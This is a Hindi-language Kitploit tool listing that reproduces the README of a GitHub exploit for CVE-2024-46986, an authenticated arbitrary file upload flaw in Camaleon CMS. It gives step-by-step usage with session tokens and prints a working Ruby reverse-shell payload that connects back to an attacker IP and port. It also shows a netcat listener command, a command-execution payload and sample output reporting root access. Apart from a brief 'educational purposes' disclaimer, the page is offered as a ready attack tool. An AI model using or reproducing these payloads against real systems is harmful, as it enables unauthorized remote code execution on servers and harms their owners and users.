Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46986 — कैमलियन CMS में मनमाना फ़ाइल अपलोड कमज़ोरी (CVE-2024-46986) के लिए स्वचालित Python एक्सप्लॉइट। प्रमाणित रिमोट कोड निष्पादन के लिए रिवर्स शेल और कमांड निष्पादन पेलोड का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/vidura2/cve-2024-46986
शोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubvidura2/cve-2024-46986

CVE-2024-46986

कैमलियन CMS में मनमाना फ़ाइल अपलोड कमज़ोरी (CVE-2024-46986) के लिए स्वचालित Python एक्सप्लॉइट। प्रमाणित रिमोट कोड निष्पादन के लिए रिवर्स शेल और कमांड निष्पादन पेलोड का समर्थन करता है।

रिपॉजिटरी देखें
391 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-46986

Camaleon CMS शोषण - मनमानी फ़ाइल अपलोड

इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो Camaleon CMS में फ़ाइल अपलोड भेद्यता के शोषण को स्वचालित करती है। यह भेद्यता एक हमलावर को सर्वर पर मनमानी फ़ाइलें (जैसे Ruby स्क्रिप्ट) अपलोड करने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड निष्पादन (RCE) या अन्य गंभीर सुरक्षा प्रभाव हो सकते हैं।

विशेषताएँ

  • फ़ाइल अपलोड शोषण: लक्ष्य सर्वर पर दुर्भावनापूर्ण Ruby स्क्रिप्ट अपलोड करता है।
  • पेलोड विकल्प: रिवर्स शेल पेलोड और कमांड निष्पादन पेलोड के बीच चयन करें।
  • बार-बार कमांड निष्पादन: कमांड निष्पादन पेलोड के लिए, स्क्रिप्ट उपयोगकर्ता को बार-बार कमांड दर्ज करने की अनुमति देती है।
  • स्वचालन: Python के requests लाइब्रेरी का उपयोग करके पूरी प्रक्रिया को स्वचालित करता है।

पूर्व-आवश्यकताएँ

  • मान्य उपयोगकर्ता क्रेडेंशियल्स: शोषण के काम करने के लिए एक प्रमाणित सत्र आवश्यक है। आपको एक मान्य उपयोगकर्ता के auth_token और _cms_session की आवश्यकता है।

  • Python 3.x: सुनिश्चित करें कि आपके पास Python 3.x स्थापित है।

  • Python requests लाइब्रेरी: यदि पहले से स्थापित नहीं है तो requests लाइब्रेरी स्थापित करें।

    root@kitploit:~
    pip install requests
    
  • उपयोग

    root@kitploit:~
    रिपॉजिटरी को क्लोन करें:
    
    bash
    

    https://github.com/vidura2/CVE-2024-46986.git cd CVE-2024-46986

    स्क्रिप्ट को संशोधित करें:

    root@kitploit:~
    Python स्क्रिप्ट में placeholder `your_auth_token_here`, `your_session_token_here`, और `https://target_site_here` को वास्तविक मानों से बदलें।
    यदि रिवर्स शेल पेलोड का उपयोग कर रहे हैं, तो `your_ip` और `your_port` को अपने IP पते और उस पोर्ट से बदलें जिस पर आप एक लिसनर सेट करेंगे।
    

    पेलोड प्रकार चुनें:

    root@kitploit:~
    रिवर्स शेल: रिवर्स शेल अपलोड करने के लिए, स्क्रिप्ट में `payload_type` वेरिएबल को "reverse_shell" पर सेट करें।
    कमांड निष्पादन: सिस्टम कमांड निष्पादित करने वाली स्क्रिप्ट अपलोड करने के लिए, `payload_type` को "command_execution" पर सेट करें। आप लक्ष्य सर्वर पर निष्पादित करने के लिए बार-बार कमांड दर्ज कर सकेंगे।
    

    शोषण चलाएं:

    bash

    python exploit_camaleon.py

    यदि कमांड निष्पादन पेलोड का उपयोग कर रहे हैं, तो आप कई कमांड दर्ज कर सकते हैं:

    bash

    root@kitploit:~
    निष्पादित करने के लिए एक सिस्टम कमांड दर्ज करें (या बाहर निकलने के लिए 'exit' टाइप करें): whoami
    निष्पादित करने के लिए एक सिस्टम कमांड दर्ज करें (या बाहर निकलने के लिए 'exit' टाइप करें): ls
    निष्पादित करने के लिए एक सिस्टम कमांड दर्ज करें (या बाहर निकलने के लिए 'exit' टाइप करें): exit
    

    पेलोड प्रकार

    1. रिवर्स शेल

    रिवर्स शेल पेलोड हमलावर की मशीन से वापस जुड़ता है, जिससे सर्वर पर रिमोट कोड निष्पादन की अनुमति मिलती है।

    root@kitploit:~
    Python कोड के अंदर Ruby स्क्रिप्ट में IP और पोर्ट को संशोधित करें।
    
    उदाहरण पेलोड:
    
    ruby
    

    require 'socket' s = TCPSocket.open('your_ip', your_port) while (cmd = s.gets) IO.popen(cmd, 'r') do |io| s.print io.read end end

    netcat का उपयोग करके अपनी मशीन पर एक लिसनर सेट करें:

    bash

    root@kitploit:~
    nc -lvnp <your_port>
    

    2. कमांड निष्पादन

    यह पेलोड एक Ruby स्क्रिप्ट अपलोड करता है जो सर्वर पर सिस्टम कमांड (उदाहरण: whoami) निष्पादित करती है। निष्पादन के दौरान आप बार-बार कमांड दर्ज कर सकते हैं।

    root@kitploit:~
    यह स्क्रिप्ट तब तक कमांड मांगती रहेगी जब तक आप exit टाइप नहीं करते।
    उदाहरण:
    
    ruby
    
    system("whoami")
    

    सफल शोषण का उदाहरण

    एक बार शोषण सफलतापूर्वक निष्पादित हो जाने पर, आपको टर्मिनल में सफलता दर्शाने वाला आउटपुट देखना चाहिए:

    python

    Exploit executed successfully with payload type: reverse_shell!

    यदि आप रिवर्स शेल का उपयोग करते हैं, तो netcat लिसनर को समझौता किए गए सर्वर के शेल तक पहुंच प्रदान करनी चाहिए।

    कमांड निष्पादन पेलोड के लिए:

    bash

    Enter a system command to execute (or type 'exit' to quit): whoami Command 'whoami' executed successfully! Response: root

    अस्वीकरण

    यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस शोषण के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। भेद्यताओं का परीक्षण या शोषण करने से पहले हमेशा सुनिश्चित करें कि आपके पास अनुमति है।

    योगदान

    सुधार या अतिरिक्त सुविधाओं के लिए बेझिझक issues या pull requests सबमिट करें!

    लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

    टूल डाउनलोड करें